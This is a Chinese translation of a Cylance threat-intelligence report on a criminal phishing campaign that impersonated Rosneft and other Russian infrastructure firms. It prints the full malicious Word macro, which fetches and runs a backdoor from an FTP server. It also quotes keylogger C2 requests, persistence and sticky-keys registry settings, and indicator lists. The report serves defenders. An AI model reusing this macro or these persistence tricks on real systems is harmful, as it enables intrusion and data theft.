一、概述
民族国家冲突问题,已经成为很多政策的主要讨论内容,也成为了网络安全战略的主导思想。当具有地缘政治意义的事件出现在报纸上之后,研究人员就会开始寻找有国家背景的威胁行为者,并判断他们是否在进行间谍、破坏、勒索、信息窃取等恶意活动,从而绘制出一个全景图。毕竟,每个事件的背后可能都潜藏着一场网络上的恶意活动。
但是,这些恶意人员也在阅读报纸,并且能够敏锐地意识到一些研究人员存在的偏见。利用这种偏见,可以轻松伪装自己,使攻击者更难以被发现。
在本篇文章中,我们将主要分析以俄罗斯国有石油公司为目标的恶意活动,最终我们认为该恶意活动并没有任何国家在幕后支持,而是仅仅以金钱为动力。
二、背景
俄罗斯石油公司称其自己是世界上最大的上市石油公司,根据纽约时报最近的分析,该公司也是俄罗斯政府的一个重要外交政策工具。该公司的一半以上股份由莫斯科拥有,是俄罗斯以及其他邻国的关键基础设施的主要支柱。
因此,当宣布达成超过100亿美元的交易,也就是将近20%的公司股份被私有化时,世界各地的新闻媒体都关注到了这一点。
这笔交易很快就延伸出了国际政治阴谋的话题:谁是买家?为什么要卖出?谁促成了这笔交易?当这笔交易在臭名昭著的Steele Dossier中出现时,事实变得更加明显。
记者、商届领袖和国际观察员也对Rosneft进行了详细的调查,其原因在于,根据新闻报道,这笔交易的各个流程不断被推迟,也出现了很多问题,还涉及到一位前卡塔尔外交官在此基金中担任主席。
我们在过去几年内,了解到关于俄罗斯石油公司的一些信息,包括其作为关键基础设施的地位、私有化涉及的巨额资金、国内与国际的政治意义,综合上述情报,我们认为它很有可能成为外国间谍活动的一大目标。
事实上,当我们在Cylance首次看到“Rosneft”这个名字出现在我们的研究中时,我们认为这可以证明我们的推断:其他国家正在赞助该恶意组织进行间谍活动。
但很快,我们就发现,最初的推断是有问题的。
三、威胁的演变
2017年7月,Cylance偶然发现了一些值得注意的恶意宏,它们嵌入在一个似乎针对俄语用户的Word文档中,该文档是我们在一个常见的恶意软件存储库中发现的。2018年初,我们观察到相同类型的文件重新出现,于是我们对其开展了深入研究。
经过认真分析,我们注意到恶意软件作者精心使用了命令和控制(C&C)域名,这些域名非常接近于俄罗斯石油和天然气行业的真实域名,特别是Rosneft和Rosneft的子公司。
在我们进一步调查的过程中,我们发现攻击者还创建了类似的网站,以模仿二十多个国有石油、天然气、化工、农业和其他关键基础设施组织,其中还包括俄罗斯最大的金融交易所。
我们发现的第一个与Rosneft相关的恶意网站是rnp-rosneft[.]ru,该网站域名类似于合法的mp-rosneft[.]ru。我们目前发现唯一使用到该域名的地方就是电子邮件地址 sec_hotline@mp-rosneft[.]ru ,Rosneft使用该地址作为保密地址,来接收关于公司欺诈、腐败和挪用公款行为的举报。
在对一些恶意软件进行仔细分析后,我们发现作者已经活跃了3年多,并且在此期间的恶意软件几乎没有变化,只修改了所针对的目标。有趣的是,根据我们发现的证据,我们认为攻击者已经开始瞄准游戏社区,特别是Steam用户,这样看来似乎能迅速获取到更多的非法收入。
四、钓鱼文档分析
Cylance的研究人员,发现了几个使用Microsoft Office宏向其目标传递恶意软件的网络钓鱼文档。目前尚不知道这些恶意文档是专门针对特定群体,还是利用以往的Spray-and-pray方法来广泛撒网。我们来具体分析其中一个恶意文档。
· SHA256:7bb9f72436bcbb5fcb190ebc2cce77e1ea41ba0e6614bf2347b4514e7d65da4a
· 文件名:На ознакомление.doc(英文翻译:For Review.doc)
Sub AutoOpen()
'
' AutoOpen [redacted]
'
'
Dim fso, tf
Dim St As String
Dim LocalFile As String
Set fso = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("WScript.shell")
LocalFile = Environ("APPDATA") & "\1.cmd"
St = "cd %APPDATA%" & vbNewLine
St = St + "echo open rnp-rosneft.ru>>1.txt" & vbNewLine
St = St + "echo admin_root>>1.txt" & vbNewLine
St = St + "echo [redacted]>>1.txt" & vbNewLine
St = St + "echo cd /public_html/>>1.txt" & vbNewLine
St = St + "echo binary>>1.txt" & vbNewLine
St = St + "echo get module.exe module.exe>>1.txt" & vbNewLine
St = St + "echo bye>>1.txt" & vbNewLine
St = St + "ftp.exe -s:1.txt & start module.exe & del /f 1.txt & del /f 1.cmd"
Set tf = fso.CreateTextFile(LocalFile, True)
tf.Write (St)
tf.Close
If fso.FileExists(LocalFile) = True Then
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
objShell.Run "cmd /K cd %APPDATA% & 1.cmd", 0
Selection.TypeText Text:="????????? ??????" + "???"
End If
End Sub在较高的一个级别,恶意宏会向%APPDATA%目录下名为“1.txt”的文本文件中写入许多FTP命令。当最后一个FTP命令执行时,将会登录到rnp-rosneft[.]ru托管的FTP服务器,并从其中下载文件,将其另存为“module.exe”。然后,它启动“module.exe”二进制文件,并删除另一个名为“1.cmd”的文件。二进制文件“module.exe”是ESET称之为RedControle的恶意软件新变种。Cylance确认了其他几个网络钓鱼恶意文档,这些文档中执行的操作将在附录中列出。
五、恶意软件分析
我们发现了几个与rnp-rosfnet[.]ru域名相关的恶意软件样本,以及从2017年7月开始与trstorg[.]ru相关的一些旧样本。根据我们能收集到的样本来看,tstorg[.]ru域名最初是一家名为“TechnoSnabTorg”的俄罗斯公司官网,该公司主营钻井和筑路设备零件,专门为Caterpillar、Komatsu、Volvo、Fiat和Hitachi的设备提供零件。
该样本在2017年7月被首次提交给在线病毒扫描程序,当时仅有13个产品能够检出。
· 2017年RedControle样本的SHA256:736aa303b35ee23204e0e7d48cb31f77605234609c2b3d89a054b7c3ec2c0544
· 文件名:Актуальный ПРАЙС10.07.2017.exe、ApMsgFwd.exe、SetLogin1Connect.exe
后门程序是以Delphi语言编写的,会通过HTTP方式与两台C&C服务器通信。在初始通信中,发送有关IP地址、主机名和驱动器的信息。
后门程序首先尝试通过TCP/80端口与IP地址91.211.245[.]246进行通信,然后尝试通过TCP/17425端口与83.166.242[.]15进行通信。在受害者计算机与服务器进行交互的过程中,键盘敲击数据、剪贴板数据、窗口名称这些内容通过HTTP以明文方式近乎实时的传送到91.211.245[.]246。
这些信息的收集,是利用众所周知的SetWindowsHookExA API来完成的。命令从另一个C&C服务器83.166.245[.]15发出,该内容看起来是明文。然而,该后门程序还具有借助Delphi Indy库通过SSL进行通信的能力:
GET /buffer.php?buffer=---------------------------------------------------------------------
%0D%0AIDA+-
+C%3A%5CDocuments+and+Settings%5CAdministrator%5CDesktop%5Ctst%5CApMs
gFwd.exe%0D%0A---------------------------------------------------------------------
%0D%0A17425%0D%0A---------------------------------------------------------------------%0D%0A
HTTP/1.1
Host: 91.211.245.246
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
GET /key.php?key=---------------------------------------------------------------------
%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe+-+FakeNet.exe%0D%0A--
-------------------------------------------------------------------%0D%0Ahelp%0D%0A%0D%0A-----
----------------------------------------------------------------%0D%0A HTTP/1.1
Host: 91.211.245.246
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
后门程序会使用传统的注册表感染方法,在用户注册表中加入如下键值:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ApMsgFwd.exe
该后门能够上传或下载文件、操作文件和文件夹、使用ZLIB压缩和解压缩文件、枚举驱动器信息和主机信息、提升权限、捕获屏幕截图和网络摄像头画面、阻止或模拟用户输入、记录键盘输入、操纵受感染系统上的进程。
来自C&C的指令以随机的方式被“_”字符分隔,试图以此来逃避HIDS和NIDS的签名,例如命令“ST_A_RT_FI_LE”。
更高版本的RedControle使用由相同“_”字符分隔的随机字符串,来进一步阻碍基于签名的分析和逆向工程工作。在Cylance研究人员分析的样本中,一些初始连接看起来像这样:
SE_ND_CO_NN_EC
SE_ND_CO_NN_EC#192.168.1.20#8vGOR7wvBT#
其中,第一行字符由C&C服务器发送,第二行字符由受害者计算机发送,其中包含IP地址和唯一受害者标识符。后门使用一系列线程进行操作,这些线程旨在将不同的后门功能划分为自主线程(Autonomous Thread),可以基于不同的预定义Delphi计时器来运行。
该后门似乎是由另外的一些作者编写的,其中包含葡萄牙语字符串写成的键盘记录部分,以及斯拉夫语字符串写成的过程操作部分功能。这些字符串在后续版本中被删除或被混淆。
六、Dropper分析
Cylance确定了一个可执行的Dropper:
b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932
这一Dropper,在系统上投放了某个版本的RedControle以及另一个值得注意的二进制文件,同时向潜在的受害者展示了一个假日礼物的漂亮画面。Dropper相对无趣,但是粘滞键后门也被放置在系统上,这就需要我们额外对其进行分析。
Dropper的SHA256哈希值:
b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932
相关RedControle的SHA256哈希值:
8f7cf81d8bfb3780b48693020a18071a9fd382d06b0b7932226b4d583b03c3af
相关StickyKeys的SHA256哈希值:
6e476a2ef02986a13274fb2a126ed60a1ede252919d6993de03622aaa7fe6228
Dropper在文件夹%ALLUSERSPROFILE%\Documents中创建了两个可执行文件svhost.exe和system.exe,同时创建了两个关联的Run键,以维护这两个可执行文件的持久性。程序svhost.exe是前面提到的RedControle变种,该恶意软件的网络回调将发送至trstorg[.]ru域名和83.166.243[.]48这个IP上。
System.exe文件是在Delphi中编写的粘滞键后门程序。它首先在Windows防火墙中打开TCP/3389端口,然后设置以下注册表项:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger -> C:\WINDOWS\system32\taskmgr.exe
HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections -> null value
该文件主要负责在目标系统上启动RDP,并执行粘滞键劫持,从而指向合法的taskmgr.exe二进制文件。
关于粘滞键(Sticky Keys),它最初是为那些难以同时按住两个或更多个键的人设计的,可以通过快速按下Shift键5次来启动粘滞键。上面的注册表项会同时启动任务管理器二进制文件taskmgr.exe以及对应的粘滞键二进制文件。粘滞键后门可以测试google.ru和各种子域名。如果测试成功,它将在TCP/80端口上向trstorg[.]ru发出以下HTTP请求:
GET /bas.php HTTP/1.1
User-Agent: DMFR
Host: trstorg.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Jan 2017 17:18:48 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=60
X-Powered-By: PHP/5.5.9-1ubuntu4.
截至我们分析时,这一样本已经失效,因为IP地址80.254.96[.]251似乎已经被重新分配,并且不再运行恶意软件的网络服务器。
七、公开来源情报分析
RedControle后门经常会创建独特的互斥锁“AppFilQsSSSwwww_jadknskjnd_jadknskjnd”,它通过公开来源情报(Open Source Intelligence,OSINT)将上述样本直接链接到以下哈希:
10c5bf2733b7147c3663baa597b2e960069edcadf794d1ec299dfcbab489dfe1
11e8692a2d2995b105591c42fcd7a0427223f2a6b16f8e6614820024cb3415f4
27614102c5386333ecd43bb086752397726783f4d1e7fe0c1735686b5199a623
4f6de2c6d6c80b459f0bdb88cf2ce22e44ad4f3045909cbd8c1fb7632956fb63
51bc34307923d83b795319877924c9ed926366758d4662c36dce58f3a1ae20bb
7a7a139b55cd5ddcbcb8f91be1d2a247d42243d2d4a595252851987075a4338d
93b2e268ca5b8fede64edc0da7195adebbe8fa490de96b5eec1489b7868710f3
a077c085dccb900ddab2542b4b332f7c43b3674c71d5cd11afdd2861b6fec2b8
c8ca5e80d3f14102fd81b0fda54120d6ce9519a72b9d3aca23cf9b5cc8c93549
其中,几个样本将与域名sxe-csgo[.]net和h84622.s05.test-hf[.]su进行通信。
这些域名都指向两个主要IP地址,分别是91.227.16[.]115和91.227.16[.]6。同时,它们对应几百个唯一的文件哈希值。
在2015年和2016年,解析为sxe-csgo[.]net的IP地址109.68.190[.]244和46.38.50[.]106被Cylance明确地确认为与针对俄罗斯Steam、Counterstrike、CS: GO社区相关。
八、基础设施分析
随着攻击者不断使用一些基础设施,Cylance目前已经能够收集到恶意软件利用的一些服务器段脚本,这些脚本用于跟踪和记录从目标受害者那里窃取的数据。此外,攻击子和利用Cloudflare批量获取免费的SSL证书,这样一来也暴露了他们的许多域名。
攻击者投入了大量时间和精力来模仿合法域名,并不断改变他们的目标。在合法域名过期后,他们偶尔也会进行抢注。
该恶意活动严重依赖于立陶宛的服务提供商vpsnet[.]lt,可能是因为该提供商的每个虚拟专用服务器(VPS)每月仅需要几欧元,成本较低。
九、结论
当我们第一次发现恶意组织使用了20多个网站来模仿真正的俄罗斯关键基础设施公司时,我们对此非常关注。创建这些域名所需付出的努力,似乎与仅将其简单地作为C&C基础设施的实际用途不成正比。
在2017年4月出版的俄罗斯版福布斯中,我们看到了一篇文章,题目为Attack of the Clones: How Schemes Work with Fake Sites of Rosneft and Other Large Companies(《克隆攻击:如何创建Rosneft以及其他大公司的虚假站点》)。
该文章的作者是Ilya Sachkov,信息安全公司Group-IB的创始人兼首席执行官,同时也是欧洲委员会和OSCE的网络犯罪专家委员会成员。
这篇文章展现了此前未发表过的Group-IB的研究成果,他们认为攻击者有一个精心设计的犯罪计划,其中的一个恶意组织正在创建合法的俄罗斯关键基础设施公司,也就是Rosneft的克隆版本,从而获取证书,并使得欺诈可以持久化。
在文章中,Sachov提供了许多模仿网站的屏幕截图,以展示这些虚假网站的原始设计与合法网站看起来有多么接近。
该文章按名称列举了几家公司和网站,Group-IB称这些公司和网站是欺诈活动的后续目标。文章声称,至少有一家受影响的公司是Group-IB的客户。
该公司的域名以及几乎所有其他域名,都在Cylance的调查中被发现。例如,除Rosneft之外,还包括Mendeleevkazot、HCSDS和EuroChem。Mendeleevkazot是一家肥料制造商,也是俄罗斯大型关键基础设施控股公司的一部分。HCSDS是西伯利亚商业联盟的缩写,这是一家由机架俄罗斯关键基础设施公司组成的控股公司。EuroChem(Group-IB的客户)是一家总部位于瑞士的肥料公司,主要在俄罗斯进行开采。该公司的名称出现在一些相关新闻中,表明该公司参与了大型金融交易以及地缘政治问题。
考虑到不同研究结果的相同之处,以及此前该恶意组织与针对游戏社区的犯罪活动的直接联系,我们似乎能够清晰地看到此次恶意活动的目的,就是在进行犯罪行为,而不是民族国家的间谍活动。
一个“良好”恶意组织的犯罪尝试与民族国家恶意活动之间的界限往往模糊不清,但威胁情报的从业者和消费者应该摒弃固有的偏见。正如我们在这篇文章中所写的那样,乍一看可能是民族国家恶意活动,但实际上只是犯罪分子在入侵主机之前先入侵了安全研究人员的思维方式。
十、附录
10.1 钓鱼文档哈希值
7bb9f72436bcbb5fcb190ebc2cce77e1ea41ba0e6614bf2347b4514e7d65da4a
cb1cb113de38ae4ea1312d133d485769ecb38f2a9306f497788cd8fbb6fc4707
dcec00c780cb71b955e32231d5340e90e51c3c1828262ec7cfa239e431accf5b
68ab10ca4f823d0246822f102c412430e0a57e2026b3f0a1fd97f200e9e0e707
10.2 RedControle哈希值
1847f578bb25fc980f8dd4112e746df0e60531012083ffbd1f294d9b19f01e26
c12e50e7c9162d8c690d3474400fe2f5d0a9c2903adbd2837d3a9023ba86fb79
9949d5d1adb4a44463363c04678dbff0d45aeff740c754aff0c3d7b54d26016d
0556aca3b5f3a4797ca36150a4b1423ec42a6827749599395d35e369f6df5568
302866c5209e8f0b0b78bbc3411e38777de9ca59a8e1c6fa0ffdf7e35aecb2aa
63d8f1566b5d0fa6459a89a0d48a163b8a356bdf2c0bec4c648b253bd8f36bb9
8f7cf81d8bfb3780b48693020a18071a9fd382d06b0b7932226b4d583b03c3af
9949d5d1adb4a44463363c04678dbff0d45aeff740c754aff0c3d7b54d26016d
aa8dc9ad33ffb69b19d2d685e302888eb557a0159c15689c0eb36b6e649c4f3a
c0b090eca76ccff3b8e7da9a3d94418d0102277a40b1dadf7fd9096ddd668e79
d31ee9ca7eb1d0fce0f688938269c7200c982f0f13daa9d40a4ce0824de6cc18
10.3 粘滞键哈希值
6e476a2ef02986a13274fb2a126ed60a1ede252919d6993de03622aaa7fe6228
10.4 Dropper哈希值
b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932
10.5 C&C服务器与钓鱼域名
10-sendmail[.]ru
3-sendmail[.]ru
a-nhk[.]ru
acron[.]ru[.]com
agrarnik-ooo[.]ru
agrocentrer-eurohem[.]ru
agroudo[.]ru
amonni[.]ru
audemar-piguet[.]ru
autch-mail[.]ru
azot-n[.]ru
azot-sds[.]ru
azotsds[.]ru
azs-gazpromneft[.]ru
balecsm[.]ru
barsintez[.]ru
bashneft-centralasia[.]ru
bashneft[.]su
berkovetc[.]ru
bitmain[.]org[.]ru
bitum-gazpromneft[.]ru
bitum-rosneft[.]ru
bitum-samara[.]ru
bitumen-rosneft[.]ru
bitumnpk[.]ru
bor-silicat[.]ru
box5[.]photosfromcessna[.]com
bulgarsyntezi[.]ru
bunker-rosneft[.]ru
card-rn[.]ru
cargill[.]com[.]ru
center-nic[.]ru
chem-torg[.]ru
chemcourier[.]ru
chickenpaws[.]ru
china-technika[.]ru
combisapsan[.]ru
contacts[.]rosneft-opt[.]su
cryptoman[.]org[.]ru
cuban-phosagro[.]ru
dc-02ec0b5f-mail[.]mail-autch[.]ru
dc-0649e3d7-mail[.]mp-star[.]ru
dc-45e81045-mail[.]cibur[.]ru
dc-99de0f72f24b[.]3-sendmail[.]ru
dv-china[.]ru
electronrg[.]ru
euro-bitum[.]ru
euro-chimgroup[.]ru
eurochem-nevinnomissk[.]ru
eurochem-novomoskovsk[.]ru
eurochem-novomoskovsk[.]ru[.]com
eurochem-orel[.]ru
eurochem-trading[.]com
eurochem-trading[.]ru
eurochemnovomoskovsk[.]ru
eurochim[.]ru[.]com
eurohem-novomokcovsk[.]ru
eurohem[.]ru
eurohemgroup[.]ru
exp[.]gazpromlpj[.]ru
expert-cabel[.]ru
farr-post[.]ru
fesagro[.]ru
flatglas[.]ru
frigat-m[.]ru
g-pntrade[.]ru
gazprom-bitumen[.]ru
gazprom-centralasia[.]ru
gazprom-international[.]su
gazpromlpg[.]com
gazpromlpj[.]ru
gazpromlpq[.]ru
gazpromneft-aero[.]ru
gispnd[.]ru
gpn-salavat[.]ru
hcsds-azot[.]ru
imap[.]mrggazprom[.]ru
inter-finans[.]ru
inter-lens[.]ru
john-dir[.]ru
kartll[.]ru
kolomna-profil[.]ru
kub-oil[.]ru
kuban-phosagro[.]ru
kubeliai[.]lt
kubmaslozavod[.]ru
kyazot[.]ru
kyrgyzstan-gazprom[.]ru
lpggazprom[.]ru
lubricants-rn[.]ru
lubricants-rosneft[.]com
lubricants-rosneft[.]ru
lukoil[.]com
mag-numoil[.]ru
map[.]ros-razvitie[.]ru
margcom[.]ru
masterhoste[.]ru
mazutibitum[.]ru
mc-gp[.]ru
mekstekla[.]ru
mendeleevscazot[.]ru
mendeleevsk-azot[.]ru
metalloprakat[.]ru
mir-polimer[.]ru
mnpz-gazpromneft[.]ru
mp-star[.]ru
mpt-o[.]ru
mrg-gazprom[.]ru
mrggazprom[.]ru
mta5[.]boommail[.]org
nic-center[.]ru
nknpz[.]rosneft-opt[.]su
nl-mk[.]ru
oil-gazpromneft[.]ru
omega-metal[.]ru
onlinecontract[.]su
ooo-agrarnik[.]com
ooo-tandem[.]net
opt-rosneft[.]ru
phaz[.]ru
polietileni[.]ru
poligal-vostok[.]ru
polimer-trubi[.]ru
polimer16[.]ru[.]com
pop[.]gazprom-centralasia[.]ru
pop[.]mnpz-gazpromneft[.]ru
pop[.]opt-rosneft[.]ru
pop[.]rnp-rosneft[.]ru
pop[.]ros-razvitie[.]ru
postaitaliana[.]win
prof-nastillist[.]ru
prof-zavod[.]ru
profzavod[.]net
promximiya[.]ru
prosintezi[.]ru
pushkinomill[.]ru
refas[.]rnp-rosneft[.]ru
refinery-yaroslavl[.]ru
refinery-yaroslavl[.]su
rn-cpr[.]ru
rn-lubricants[.]ru
rnp-rosneft[.]ru
roamingupdate[.]eu
ros-eurochem[.]ru
ros-metal[.]ru
ros-nefti[.]ru
ros-razvitie[.]ru
rosagrotrayd[.]ru
rosneft-centralasia[.]ru
rosneft-de[.]com
rosneft-opt[.]com
rosneft-opt[.]su
rosneft-tender[.]ru
rosneft-tender[.]su
rosneft-tuapse[.]ru
rospolimery[.]ru
rost-selmash[.]ru
rps[.]ru[.]com
ru-uralchem[.]ru
ru-uralhim[.]ru
ruproflist[.]ru
rus-agrohim[.]ru
rusagro-him[.]ru
rusagrohim[.]com
russbitum[.]ru
saharzol[.]com
sal-stek[.]ru
salavstek[.]ru
salstec[.]ru
salstek[.]com[.]ru
samp[.]real-city[.]lt
sarat-steklo[.]ru
saratovstroisteklo[.]ru
saratovstroy-steklo[.]ru
severstal[.]com[.]ru
sibur[.]com[.]ru
sibur[.]ru[.]com
siburint[.]ru
simf-khp[.]ru
smtp[.]gazpromlpj[.]ru
spectech-china[.]ru
spi-mex[.]ru
steklo-stroj[.]ru
successex[.]ru
successex24[.]ru
sx[.]perfecttool[.]net
ta-bitum[.]ru
tdbkh[.]ru
teh-mail[.]ru
tektorg-rosneft[.]ru
tender-rosneft[.]com
tender-rosneft[.]net
tender-rosneft[.]ru
tender-rosneft[.]su
tender[.]ros-nefti[.]ru
tiret-salt[.]ru
titanomsk[.]ru
tmez[.]ru
tolyatiazot[.]ru
transneft[.]su
trstorg[.]ru
tsenazabora[.]ru
tuapse-rosneft[.]ru
ufaneftehim[.]bashneft[.]su
ufaorgsintez[.]bashneft[.]su
ural-met[.]su
uralchem[.]net[.]ru
uralchemm[.]ru
uralchim[.]com
uralchim[.]com[.]ru
uralhem[.]ru
vitohim-rostov[.]ru
vmznasos[.]ru
vmzz[.]ru
vojxua[.]iheys[.]in
volga-phosagro[.]ru
vostok-polygal[.]ru
wapmafija[.]eu
world-provodnik[.]ru
wtpc[.]ru
xn—-7sbiki4aifik1ax[.]xn--p1ai
xn—-8sbyfdnfhp0c[.]xn--p1ai
xn—-gtbcbb8bdhqbmdl1a[.]xn--p1ai
xn—-gtbcbb8bdhqbmdl1a5j[.]xn--p1ai
xn--80aaoboarccvfll0ah5mza[.]xn--p1ai
xn--e1apchgin[.]xn--p1ai
xn--j1aicfcj5e[.]xn--e1apchgin[.]xn--p1ai
yandex[.]mail-autch[.]ru
yug-polimer[.]ru
本文翻译自:https://threatvector.cylance.com/en_us/home/poking-the-bear-three-year-campaign-targets-russian-critical-infrastructure.html
翻译作者:41yf1sh 原文地址: http://www.4hou.com/info/observation/15276.html
